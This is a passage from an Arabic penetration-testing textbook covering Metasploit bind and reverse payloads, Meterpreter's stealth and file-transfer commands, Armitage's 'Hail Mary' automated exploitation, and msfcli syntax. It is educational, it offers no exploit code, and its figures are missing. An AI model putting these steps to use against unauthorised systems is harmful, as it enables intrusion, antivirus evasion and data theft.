‫اﻟﻌﺛور ﻋﻠﻰ اﻟﺗﻔﺎﺻﯾل اﻟﻛﺎﻣﻠﺔ ﻣن ﺧﻼل ﻣراﺟﻌﺔ اﻟوﺛﺎﺋﻖ ‪ Metasploit‬ﻋن ﻛﺛب‪ .‬ھﻧﺎك ﺷﻲء اﺧر ﯾﺳﺑب اﻻرﺗﺑﺎك ﻟﻛﺛﯾر ﻣن اﻟﻧﺎس ھو اﻟﻔرق‬
‫ﺑﯾن ‪ payloads‬ﻣﻣﺎﺛﻠﺔ ﻣﺛل ]‪ [windows/meterpreter/bind_tcp‬و ]‪[windows/meterpreter/reverse_tcp‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪304‬‬

‫اﻟﻔرق اﻟرﺋﯾﺳﻲ ﺑﯾن ھذﯾن ھو اﺗﺟﺎه اﻻﺗﺻﺎل ﺑﻌد اﺧﺗراق اﻟﻧظﺎم اﻟﮭدف‪.‬‬
‫‪ -‬ﻓﻲ ‪ ،bind payload‬ﻧﺣن ﻓﻲ وﻗت واﺣد ﻧﻘوم ﺑﺈرﺳﺎل ‪ exploit‬وإﺟراء‬
‫اﺗﺻﺎل إﻟﻰ اﻟﮭدف ﻣن اﻟﺟﮭﺎز‪ .‬ﻓﻲ ھذا اﻟﻣﺛﺎل‪ ،‬اﻟﻣﮭﺎﺟم ﯾرﺳل ‪exploit‬‬
‫ﻟﻠﮭدف واﻟﮭدف ﯾﻧﺗظر اﻻﺗﺻﺎل ان ﯾﺄﺗﻲ اﻟﯾﮫ ﺑﻌد إرﺳﺎل ‪ ،exploit‬وآﻟﺔ‬
‫اﻟﻣﮭﺎﺟم ﺗرﺗﺑط ﺑﺎﻟﮭدف‪.‬‬
‫‪ -‬ﻓﻲ ‪ ،reverse payload‬آﻟﺔ اﻟﻣﮭﺎﺟم ﺗرﺳل ‪ exploit‬وﻟﻛن ﯾﻔرض ﻋﻠﻰ‬
‫اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف اﻻﺗﺻﺎل ﻣرة أﺧرى إﻟﻰ اﻟﻣﮭﺎﺟم‪ .‬ﻓﻲ ھذا اﻟﻧوع ﻣن‬
‫اﻟﮭﺟوم‪ ،‬ﺑدﻻ ﻣن اﻻﻧﺗظﺎر ﻋن اﺗﺻﺎل وارد ﻋﻠﻰ ﻣﻧﻔذ ﻣﺣدد أو ﺧدﻣﺔ‪ ،‬ﻓﺎن‬
‫اﻟﺟﮭﺎز اﻟﮭدف ﯾﺟﻌل اﺗﺻﺎل ﻣرة أﺧرى إﻟﻰ اﻟﻣﮭﺎﺟم‪.‬‬

‫اﺧر ﻣوﺿوع ﻋن ‪ Metasploit‬ﺣﯾث ﺳوف ﻧﺗطرق ﻟﻣﻧﺎﻗﺷﺔ ‪ Metasploit‬ﺑﺎﻟﻛﺎﻣل ﻻﺣﻘﺎ ھو‪ Meterpreter . Meterpreter‬او‬
‫‪ Meta-Interpreter‬ھﻲ أداة ﻗوﯾﺔ وﻣرﻧﺔ اﻟﺗﻲ ﺳوف ﺗﺣﺗﺎج ﺗﻌﻠﻣﮭﺎ إذا ﻛﻧت ﺗرﯾد إﺗﻘﺎن ﻓن‪ ،Meterpreter . Metasploit‬ھﻲ‬
‫‪ payload‬ﻣﺗﺎﺣﺔ ﻓﻲ ‪ Metasploit‬اﻟذي ﯾﻌطﻲ اﻟﻣﮭﺎﺟﻣﯾن ﻗذﯾﻔﺔ اﻟﻘﯾﺎدة اﻟﻘوﯾﺔ اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠﺗﻔﺎﻋل ﻣﻊ ھدﻓﮭم‪ .‬آﺧر ﻣﯾزة ﻛﺑﯾرة ﻟل‬
‫‪Meterpreter‬ھو ﺣﻘﯾﻘﺔ أﻧﮫ ﯾﻌﻣل ﺑﺎﻟﻛﺎﻣل ﻓﻲ اﻟذاﻛرة وﻻ ﯾﺳﺗﺧدم اﻟﻘرص اﻟﺻﻠب أﺑدا‪ .‬ﯾوﻓر ھذا اﻟﺗﻛﺗﯾك طﺑﻘﺔ ﻣن اﻟﺷﺑﺢ اﻟﺗﻲ ﺗﺳﺎﻋد ﻋﻠﻰ‬
‫اﻟﺗﮭرب ﻣن اﻟﻌدﯾد ﻣن أﻧظﻣﺔ اﻟﺣﻣﺎﯾﺔ ﻣن اﻟﻔﯾروﺳﺎت وﯾﮭرب ﻣن ﺑﻌض أدوات اﻟطب اﻟﺷرﻋﻲ‪.‬‬
‫وظﺎﺋف ‪ Meterpreter‬ﺑطرﯾﻘﺔ ﻣﺷﺎﺑﮭﺔ إﻟﻰ ‪ Windows cmd.exe‬أو ‪ .Linux /bin/sh‬ﺑﻣﺟرد ﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪ ،‬ﻓﺄﻧﮭﺎ ﺗﺗﯾﺢ‬
‫ﻟﻠﻣﮭﺎﺟم اﻟﺗﻔﺎﻋل ﻣﻊ وﺗﻧﻔﯾذ اﻷواﻣر ﻋﻠﻰ اﻟﮭدف ﻛﻣﺎ ﻟو ﻛﺎن اﻟﻣﮭﺎﺟم ﯾﺟﻠس ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺣﻠﻲ اﻟﺧﺎص ﺑﮫ‪ .‬ﻣن اﻟﻣﮭم ﺟدا أن ﻧﻔﮭم أن ﺳﯾﺗم‬
‫ﺗﺷﻐﯾل ‪ Meterpreter‬ﻣﻊ اﻻﻣﺗﯾﺎزات اﻟﻣﻘﺗرﻧﺔ ﺑﺎﻟﺑرﻧﺎﻣﺞ اﻟذي ﺗم اﺧﺗراﻗﮭﺎ‪.‬‬
‫‪ Meterpreter‬ﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻟﻣﯾزات اﻟراﺋﻌﺔ اﻟﺗﻲ ﺑﻧﯾت ﻓﯾﮭﺎ اﻓﺗراﺿﯾﺎ‪ .‬ﺗﺷﻣل اﻟوظﺎﺋف اﻷﺳﺎﺳﯾﺔ اﻷﻣر " ‪ ،“ migrate‬وھو أﻣر ﻣﻔﯾد‬
‫ﻟﺗﺣرﯾك اﻟﺧﺎدم ﻟﻌﻣﻠﯾﺔ أﺧرى‪ .‬وھذا ﻣﮭم ﺟدت‪ ،‬ﻓﻲ ﺣﺎل ﺗم إﯾﻘﺎف اﻟﺧدﻣﺔ اﻟﺗﻲ ﺗﻌﺗﺑر ﻧﻘطﺔ ﺿﻌف واﻟﺗﻲ ﺳف ﺗﮭﺎﺟﻣﮭﺎ‪ .‬وظﯾﻔﺔ ﻣﻔﯾدة آﺧري ھو‬
‫اﻻﻣر "‪ " cat‬اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻌرض ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ﻋﻠﻰ اﻟﺷﺎﺷﺔ اﻟﻣﺣﻠﯾﺔ‪ .‬وھذا ﻣﻔﯾد ﻻﺳﺗﻌراض اﻟﻣﻠﻔﺎت اﻟﻣﺧﺗﻠﻔﺔ ﻋﻠﻰ اﻟﮭدف‪ .‬ﯾﺳﻣﺢ‬
‫اﻻﻣر " ‪ " download‬ﻟﺳﺣب ﻣﻠف أو دﻟﯾل ﻣن اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف‪ ،‬ﻣﻣﺎ ﯾﺟﻌل ﻧﺳﺧﺔ ﻣﺣﻠﯾﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻣﮭﺎﺟم‪ .‬ﯾﻣﻛن اﺳﺗﺧدام اﻷﻣر "‬
‫‪ " upload‬ﻟﻧﻘل اﻟﻣﻠﻔﺎت ﻣن ﺟﮭﺎز اﻟﻣﮭﺎﺟم إﻟﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف‪ .‬ﯾﻣﻛن اﺳﺗﺧدام اﻷﻣر " ‪ " edit‬ﻹﺟراء ﺗﻐﯾﯾرات ﻋﻠﻰ ﻣﻠﻔﺎت ﺑﺳﯾطﺔ‪ .‬ﯾﻣﻛن‬
‫اﺳﺗﺧدام اﻻﻣر " ‪ " execute‬ﻹﺻدار أﻣر‪ ،‬وأﻧﮭﺎ ﺗﻌﻣل ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﺑﻌﯾد‪ ،‬ﻓﻲ ﺣﯾن أن اﻻﻣر " ‪ "kill‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟوﻗف اﻟﻌﻣﻠﯾﺔ‪.‬‬
‫اﻷواﻣر اﻟﺗﺎﻟﯾﺔ ھﻲ أﯾﺿﺎ ﻣﻔﯾدة وﺗوﻓر ﻧﻔس اﻟوظﯾﻔﺔ ﺑﺎﻟﺿﺑط ﻛﻣﺎ ﯾﻔﻌﻠون ﻋﻠﻰ ﺟﮭﺎز ﻟﯾﻧﻛس اﻟﻌﺎدي‪shutdown " ،“ ps " ،“ ls" ،“ cd " :‬‬
‫“‪ ،“ pwd " ،“ mkdir " ،‬و " ‪.“ ifconfig‬‬
‫ﻛﻣﺎ ﺗرون‪ ،‬اﻟﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ ‪ Meterpreter‬ھﻲ واﺣدة ﻣن أﻛﺛر وﺳﺎﺋل ﻗوﯾﺔ وﻣرﻧﺔ‪ ،‬واﻟﺗﺧﻔﻲ ﯾﻣﻛن ﻷﺣد اﻟﻣﮭﺎﺟﻣﯾن اﻟﺗﻔﺎﻋل ﻣﻊ اﻟﮭدف‪.‬‬
‫أﻧﮭﺎ ﺗﺳﺗﺣﻖ وﻗﺗك ﻟﻣﻌرﻓﺔ ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ھذه اﻷداة ﻓﻲ ﻣﺗﻧﺎول ﯾدي‪ .‬ﺳﻧﻌود إﻟﻰ ‪ Meterpreter‬ﻋﻧدﻣﺎ ﻧﻧﺎﻗش ‪ post exploitation‬ﻓﻲ‬
‫اﻟﺧطوة ‪.4‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪305‬‬

‫‪MASTERING ARMITAGE, THE GRAPHICAL MANAGEMENT TOOL FOR METASPLOIT‬‬

‫إﺻدارات أﺣدث ﻣن ‪ Metasploit‬ذات وﺟﮫ رﺳوﻣﯾﮫ ﺗدﻋﻰ ارﻣﯾﺗﺎج )‪ .(Armitage‬ﻓﮭم أرﻣﯾﺗﺎج ﻣﮭم ﻷﻧﮫ ﯾﺟﻌل ﻓﻲ ﻧﮭﺎﯾﺔ اﻟﻣطﺎف‬
‫اﺳﺗﺧداﻣك ﻟل‪ Metasploit‬أﺳﮭل ﻋن طرﯾﻖ ﺗوﻓﯾر اﻟﻣﻌﻠوﻣﺎت ﻟك ﺑﺻرﯾﺎ‪ .‬أﻧﮫ ﯾﺷﻣل وﺣدة اﻟﺗﺣﻛم ‪ ،Metasploit‬وﺑﺎﺳﺗﺧدام ﻗدرات‬
‫اﻟﺟدوﻟﺔ ﻟﮭﺎ‪ ،‬وﯾﺳﻣﺢ ﻟك أن ﺗرى أﻛﺛر ﻣن وﺣدة اﻟﺗﺣﻛم ‪ Metasploit‬أو ﺟﻠﺳﺔ ‪ Meterpreter‬ﻓﻲ وﻗت واﺣد‪.‬‬
‫ﯾﻣﻛﻧك ﻗراءة اﻟﻣزﯾد ﻋن ھذه اﻷداة ﺑزﯾﺎرة اﻟﻣوﻗﻊ ‪http://www.fastandeasyhacking.com‬‬
‫‪Start | Kali Linux | Exploitation Tools | Network Exploitation Tools | Armitage‬‬

‫‪ -1‬ﻋﻠﻰ ﺷﺎﺷﺔ ﺗﺳﺟﯾل اﻟدﺧول ﻟﻸرﻣﯾﺗﺎج‪ ،‬اﻧﻘر ﻋﻠﻰ زر ‪:connect‬‬

‫‪ -2‬ﻗد ﯾﺳﺗﻐرق ارﻣﯾﺗﺎج ﺑﻌض اﻟوﻗت ﻟﻼﺗﺻﺎل ﺑﺎﻠ ‪ .Metasploit‬ﻓﻲ ﺣﯾن أن ھذا ﯾﺣدث‪ ،‬ﻗد ﺗرى ﻧﺎﻓذة اﻹﻋﻼم اﻟﺗﺎﻟﻲ‪ .‬ﻻ ﺗﻧدھش‪.‬‬
‫وﺳوف ﺗزول ﺑﻣﺟرد ان ﯾﻛون أرﻣﯾﺗﺎج ﻗﺎدرا ﻋﻠﻰ اﻻﺗﺻﺎل‪ .‬ﻓﻲ اﻟﺷﺎه ذات اﻟﻌﻧوان ?‪ ،Start Metasploit‬اﻧﻘر ﻋﻠﻰ ‪:yes‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪306‬‬

‫‪ -3‬ﺛم ﯾﺗم ﺗﻘدﯾﻣك اﻟﻰ اﻟﺷﺎﺷﺔ ارﻣﯾﺗﺎج اﻟرﺋﯾﺳﯾﺔ‪ .‬وﻧﺣن اﻵن ﻓﻲ ﻣﻧﺎﻗﺷﺔ اﻟﻣﻧﺎطﻖ اﻟﺛﻼث اﻟﺗﺎﻟﯾﺔ ﻋﻠﻰ اﻟﺷﺎﺷﺔ اﻟرﺋﯾﺳﯾﺔ )وﺿﻊ ﻋﻼﻣﺔ ‪،A.‬‬
‫‪ G ،.B‬ﻓﻲ اﻟﺻورة اﻟﺗﺎﻟﯾﺔ(‪:‬‬
‫‪ :A‬ﺗﻌرض ھذه اﻟﻣﻧطﻘﺔ اﻟوﺣدات اﻟﻣﻌدة ﺳﺎﺑﻘﺎ‪ .‬ﯾﻣﻛﻧك اﻟﺑﺣث ﻋن اﻟوﺣدات ﺑﺎﺳﺗﺧدام ‪ SPACE‬اﻟﻣﺗوﻓرة أدﻧﺎ ﻗﺎﺋﻣﺔ اﻟوﺣدات اﻟﻧﻣطﯾﺔ‪.‬‬
‫‪ :B‬ﺗﻌرض ھذه اﻟﻣﻧطﻘﺔ أھداﻓك اﻟﻧﺷطﺔ اﻟﺗﻲ ﻧﺣن ﻗﺎدرون ﻋﻠﻰ ﺗﺷﻐﯾل ‪ exploit‬اﻟﺗﻲ ﻟدﯾﻧﺎ ﺿد اﻟﮭدف‪.‬‬
‫‪ :C‬ﺗﻌرض ھذه اﻟﻣﻧطﻘﺔ اﻟﻌدﯾد ﻣن ‪ Metasploit‬ﻟﻠﺳﻣﺎح ﻟﻠﻌدﯾد ﻣن ‪ Meterpreter‬أو ﺟﻠﺳﺎت ‪ CONSOLE‬ﻟﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ وﻋرﺿﮭﺎ‬
‫ﻓﻲ وﻗت واﺣد‪.‬‬

‫طرﯾﻘﺔ ﺑدﯾﻠﺔ ﻹطﻼق ارﻣﯾﺗﺎج ھو ﻛﺗﺎﺑﺔ اﻷﻣر ‪ armitage‬ﻓﻲ إطﺎر اﻟﺗرﻣﻧﺎل‪.‬‬

‫ﻟﻣﺎذا ﻧﺗﻌرف ﻋﻠﻰ ﺧﻣس أدوات وﻋﻧدﻧﺎ اداه واﺣده ﻓﻘط ﺗﻌﻣل ﻛل ھذا؟‬

‫ﻗﺑل أن ﻧﺗﻣﻛن ﻣن اﻟﺑدء ﻓﻲ اﺳﺗﺧدام ‪ exploit‬ﻋﻠﻰ ھدﻓﻧﺎ‪ ،‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ اﻟﻘﯾﺎم ﻗﻠﯾﻼ ﺑﺑﻌض اﻻﻋﻣﺎل‪ .‬أوﻻ‪ ،‬ﻧﺳﺗﺧدم ارﻣﯾﺗﺎج ﻟﻔﺣص اﻟﺷﺑﻛﺔ‬
‫اﻟﻣﺣﻠﯾﺔ اﻟﺧﺎﺻﺔ ﺑﻧﺎ وﺗﺣدﯾد أي ﻣن اﻷھداف اﻟﺣﯾﺔ‪ .‬ﻟﺗﺷﻐﯾل اﻟﻔﺣص‪ ،‬اﻧﻘر ﻋﻠﻰ "‪ "hosts‬اﻟﺧﯾﺎر اﻟﻣوﺟود ﻓﻲ اﻟﻘﺎﺋﻣﺔ وﻣن ﺛم اﺧﺗﯾﺎر "‬
‫)‪ " Quick Scan (OS detect‬ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺻورة اﻟﺗﺎﻟﯾﺔ‪.‬‬

‫ﺑﻌد اﺧﺗﯾﺎر ")‪ " Quick Scan (OS detect‬ﺳوف ﺗﺣﺗﺎج إﻟﻰ ﺗوﻓﯾر ﻋﻧوان ‪ IP‬ﺻﺎﻟﺢ أو ﻧطﺎق ‪ IP‬ﻟﻌﻣﻠﯾﺔ اﻟﻔﺣص‪ .‬ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن‬
‫اﻟﻔﺣص‪ ،‬ﻓﺈن أي ﻣن اﻷھداف اﻟﻣﺣددة ﺳوف ﺗظﮭر ﻋﻠﻰ اﻟﺷﺎﺷﺔ ﻓﻲ ﻣﺳﺎﺣﺔ اﻟﻌﻣل‪ .‬ﯾﻘدم اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻣﺛﺎل ﻟﮭذا اﻟﻧﺎﺗﺞ‪ .‬وﺳوف ﯾظﮭر ﻟك‬
‫رﺳﺎﻟﺔ ﺗﻌطﯾك ﺗﻌﻠﯾﻣﺎت ﺣول إﯾﺟﺎد ‪."Use Attacks → Find Attacks " exploit‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪307‬‬

‫طﺎﻟﻣﺎ ﺣدد ارﻣﯾﺗﺎج ھدﻓﺎ ﻣﺣﺗﻣﻼ واﺣد ﻋﻠﻰ اﻷﻗل‪ ،‬ﻓﺈﻧك ﻋﻠﻰ اﺳﺗﻌداد ﻹطﻼق اﻟﻌﻧﺎن ﻟﺳﯾل ﻣن ‪ .exploit‬ﻹﻧﺟﺎز ھذا‪ ،‬ﺑﺑﺳﺎطﺔ اﻧﻘر ﻋﻠﻰ زر‬
‫"‪ "Attacks‬ﻣن اﻟﻘﺎﺋﻣﺔ اﻟﺗﻲ ﺗﻠﯾﮭﺎ "‪ " Hail Mary‬ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪:‬‬

‫ﺑﺎﻟﻧﻘر ﻋﻠﻰ اﻟﺧﯾﺎر اﻟﺳﻼم ‪ Hail Mary‬ﻓﺎﻧﮫ ﯾﺟﻌل أرﻣﯾﺗﺎج إﻟﻰ ارﺳﺎل طوﻓﺎن ﻣن ‪ exploit‬ﺿد اﻟﮭدف‪ .‬ﺳﺗﺑدأ أداة اﻟﺗﺷﻐﯾل وإﺻدار‬
‫اﻷواﻣر ﺗﻠﻘﺎﺋﯾﺎ‪ .‬ﻗد ﺗﺳﺗﻐرق ھذه اﻟﻌﻣﻠﯾﺔ ﻋدة دﻗﺎﺋﻖ ﻟﻺﺗﻣﺎم‪ .‬ﯾﻣﻛﻧك ﻣﺷﺎھدة ﺗﻘدم ﻟﻠﺑرﻧﺎﻣﺞ ﻓﻲ اﻟﻧﺻف اﻟﺳﻔﻠﻲ ﻣن اﻟﻧﺎﻓذة‪ .‬ان ارﻣﯾﺗﺎج ﺳوف ﯾﻘدم‬
‫ﻟك اﯾﺿﺎ ﺷرﯾط اﻟﺗﻘدم )‪ (progress bar‬ﻟﺗﻣﻛﻧك ﻣن ﻣﻌرﻓﺔ ﻣدى طول اﻟﻌﻣﻠﯾﺔ وﺗﻘدﻣﮭﺎ‪ .‬ﻟﻧﻛون واﺿﺣﯾن‪ ،‬ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﻓﺎن ارﻣﯾﺗﺎج ﯾﻘوم‬
‫ﺑرﺑط ﻧﺗﺎﺋﺞ ‪ Nmap‬ﻣﻊ ‪ exploit‬ﻓﻲ ‪ Metasploit‬وﯾرﺳل ﻛل ‪ exploit‬ذات اﻟﺻﻠﺔ ﺑﺎﻟﮭدف اﻧﺗﺑﮫ ﺟﯾدا ﻟواﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ اﻟﺗﻲ‬
‫ﺗﻣﺛل اﻟﮭدف اﻟﺧﺎص ﺑك ﻓﻲ ﺷﺎﺷﺔ أرﻣﯾﺗﺎج؛ إذا ﻛﺎن اﻟﮭدف أﺻﺑﺢ ﻣﺣدد ﺑﺿوء اﺣﻣر ﻋﻠﻰ ﺷﻛل ﺑرق‪ ،‬ﻓﮭذا ﯾﻌﻧﻰ ان أرﻣﯾﺗﺎج ﻧﺟﺢ ﻓﻲ اﺧﺗراق‬
‫اﻟﮭدف‪ .‬وﯾﺑﯾن اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻣﺛﺎل ﻋﻠﻰ اﺧﺗراق اﻟﮭدف ﺑﺛﻼث ﺷل ﻋن ﺑﻌد‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪308‬‬

‫ﻋﻧدﻣﺎ اﺳﺗﻧﻔﺎذ أرﻣﯾﺗﺎج اﻣداداﺗﮭﺎ ﻣن ‪ exploit‬اﻟﻣﺣﺗﻣﻠﺔ‪ ،‬ﻓﺎﻧﮫ ﯾﻣﻛﻧك ﻋرض أي او ﺟﻣﯾﻊ اﻟﺷل اﻟﺗﻲ ﺗم اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻋن طرﯾﻖ اﻟﻧﻘر ﺑﺎﻟزر‬
‫اﻷﯾﻣن ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪:‬‬

‫ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﯾﻣﻛﻧك اﻟﺗﻔﺎﻋل ﻣﻊ ھذا اﻟﮭدف‪ ،‬وﺗﺣﻣﯾل اﻟﺑراﻣﺞ واﻟﻣواد إﻟﻰ اﻟﮭدف‪ ،‬أو أداء ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن ﻏﯾرھﺎ ﻣن اﻟﮭﺟﻣﺎت‪.‬‬
‫ﻟﻠﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ ﺷل وﺗﺷﻐﯾل اﻷواﻣر ﻋﻠﻰ اﻟﮭدف اﻟﺑﻌﯾد‪ ،‬اﻧﻘر ﻓوق اﻟﺧﯾﺎر "‪ ." interact‬ھذا ﺳﯾﺳﻣﺢ ﻟك ﻹﺻدار وﺗﺷﻐﯾل اﻷواﻣر ﻓﻲ‬
‫إطﺎر اﻟﺗرﻣﻧﺎل اﻟﺧﺎص ارﻣﯾﺗﺎج‪ .‬ﺟﻣﯾﻊ أواﻣر اﻟﺗﺷﻐﯾل ﺷوف ﯾﺗم ﺗﻧﻔﯾذھﺎ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﺑﻌﯾد ﻛﻣﺎ ﻟو ﻛﺎن ﻟدﯾك اﻟوﺻول اﻟﻣﺎدي وﺗﺗم اﻟﻛﺗﺎﺑﺔ ﻓﻲ‬
‫اﻟﺗرﻣﻧﺎل ﻋﻠﻰ اﻟﮭدف‪.‬‬

‫)‪MASTERING THE METASPLOIT CLI (MSFCLI‬‬

‫ﻓﻲ ھذه اﻟﺟزء‪ ،‬ﺳوف ﻧﺳﺗﻛﺷف)‪ Metasploit . Metasploit CLI (MSFCLI‬ﯾﺗطﻠب اﺳﺗﺧدام واﺟﮭﺔ ﻣن أﺟل أداء ﻣﮭﺎﻣﮫ‪.‬‬
‫و ‪MSFCLI‬ھو ﻣﺛﺎل ﻟﮭذه اﻟواﺟﮭﺔ‪ .‬ﺑل ھو واﺟﮭﺔ ﺟﯾدة ﻟﺗﻌﻠم ‪ Metasploit‬أو اﺧﺗﺑﺎر‪/‬ﻛﺗﺎﺑﺔ ‪ exploit‬ﺟدﯾد‪ .‬ﺑل ﯾﻌﻣل أﯾﺿﺎ ﺑﺷﻛل ﺟﯾد ﻓﻲ‬
‫ﺣﺎﻟﺔ اﺳﺗﺧدام اﻟﺳﻛرﯾﺑت وﺗطﺑﯾﻖ اﻟﻣﮭﺎم اﻷﺳﺎﺳﯾﺔ ﺑطرﯾﻘﮫ اﻟﯾﮫ‪.‬‬
‫اﻟﮭدف اﻟرﺋﯾﺳﻲ ﻣﻊ اﺳﺗﺧدام ‪ MSFCLI‬ھو أﻧﮫ ﯾﻣﻛﻧك ﻓﻘط ﻓﺗﺢ ﺷل ﻓﻲ ﻛل ﻣرة‪ .‬ﺳﺗﻼﺣظ أﯾﺿﺎ اﺳﺗﻛﺷﺎف ﺑﻌض اﻷواﻣر ﻟدﯾﻧﺎ أﻧﮫ ﯾﻌﻣل أﺑطﺄ‬
‫ﻗﻠﯾﻼ وھﻲ أﻛﺛر ﺗﻌﻘﯾدا ﺑﻘﻠﯾل ﻣن ‪ .MSFCONSOLE‬أﺧﯾرا‪ ،‬ﻋﻠﯾك أن ﺗﻌرف ﺑﺎﻟﺿﺑط ‪ exploit‬اﻟذي ﺗرﻏب ﻓﻲ ﺗﺷﻐﯾل ﻣن أﺟل اﺳﺗﺧدام‬
‫‪ .MSFCLI‬وھذا ﯾﻣﻛن أن ﯾﺟﻌل ﻣن اﻟﺻﻌب ﻗﻠﯾﻼ ﻻﺧﺗﺑﺎر اﻻﺧﺗراق اﻟﺟدد اﻟذﯾن ﻟﯾﺳوا ﻋﻠﻰ دراﯾﺔ ﻣﻊ ﻗﺎﺋﻣﺔ ‪ Metasploit‬ﻣن ‪.exploit‬‬
‫ﺑﻌض اﻷواﻣر ل‪ MSFCLI‬ھﻲ‪:‬‬
‫‪ :msfcli -1‬ھذا اﻻﻣر ﯾﻘوم ﺑﺗﺣﻣﯾل ﻗﺎﺋﻣﺔ ﺑﺟﻣﯾﻊ ‪ exploit‬اﻟﻣﺗوﻓرة ﻓﻲ ﻣﺗﻧﺎول ‪.MSFCLI‬‬
‫‪ :msfcli -h -2‬ﯾﻌرض ﻣﻠف ﻣﺳﺎﻋدة ‪.MSFCLI‬‬
‫‪ :msfcli [PATH TO EXPLOIT] [options = value] -3‬ھذه اﻟﺻﯾﻐﺔ ﻣن أﺟل ﺷن ‪.exploit‬‬

‫ﺑدء ﺗﺷﻐﯾل )‪ Metasploit CLI (MSFCLI‬ﺑﺎﺳﺗﺧدام اﻷﻣر اﻟﺗﺎﻟﻲ‪ .‬ﯾرﺟﻰ اﻟﺗﺣﻠﻲ ﺑﺎﻟﺻﺑر ﻷن ھذا ﻗد ﯾﺳﺗﻐرق ﻗﻠﯾﻼ ﻣن اﻟوﻗت‬ ‫‪-‬‬
‫اﻋﺗﻣﺎدا ﻋﻠﻰ ﺳرﻋﺔ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ .‬ﻻﺣظ أﯾﺿﺎ أﻧﮫ ﻋﻧد ﺗﺣﻣﯾل ‪ ،MSFCLI‬ﻓﺎن ﻗﺎﺋﻣﺔ ﻣن ‪ exploit‬اﻟﻣﺗﺎﺣﺔ ﺳوف ﯾﺗم‬
‫ﻋرﺿﮭﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪309‬‬

‫ﻋرض ﻣﻠﻔﺎت اﻟﻣﺳﺎﻋدة ﻟل ‪ MSFCLI‬ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬

‫ﻣن أﺟل اﻟﻌرض اﻟﺗوﺿﯾﺣﻲ‪ ،‬ﻓﺈﻧﻧﺎ ﺳوف ﻧﻘوم ﺑﺈﺟراء ﻓﺣص ‪ .Christmas Tree Scan‬وﺳوف ﻧﺧﺗﺎر اﻟﺧﯾﺎر ‪ A‬ﻟﻌرض‬ ‫‪-‬‬
‫وﺣدات اﻟﺧﯾﺎرات اﻟﻣﺗﻘدﻣﺔ‪:‬‬

‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك ﯾﻣﻛﻧك ﺳرد ﻣوﺟز ﻟﻠوﺣدات اﻟﻧﻣطﯾﺔ اﻟﺣﺎﻟﯾﺔ ﺑﺎﺳﺗﺧدام اﻟوﺿﻊ ‪ .S‬وﺿﻊ ﻣﻠﺧص ھو وﺳﯾﻠﺔ راﺋﻌﺔ ﻟﻣﻌرﻓﺔ ﻛﺎﻓﺔ‬ ‫‪-‬‬
‫اﻟﺧﯾﺎرات اﻟﻣﺗﺎﺣﺔ ﻟك ﻓﻲ ‪ exploit‬اﻟذي ﺗﺣﺎول ﺗﺷﻐﯾﻠﮫ‪ .‬اﻟﻌدﯾد ﻣن اﻟﺧﯾﺎرات اﺧﺗﯾﺎرﯾﺔ وﻟﻛن‪ ،‬ﻋﺎدة‪ ،‬ﯾطﻠب ﻣن ﻋدد ﻗﻠﯾل واﻟذي‬
‫ﯾﺳﻣﺢ ﻟك ﻟﺗﺣدﯾد اﻟﮭدف أو اﻟﻣﻧﻔذ اﻟذي ﺗﺣﺎول إطﻼق ‪ exploit‬ﺿد‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪310‬‬

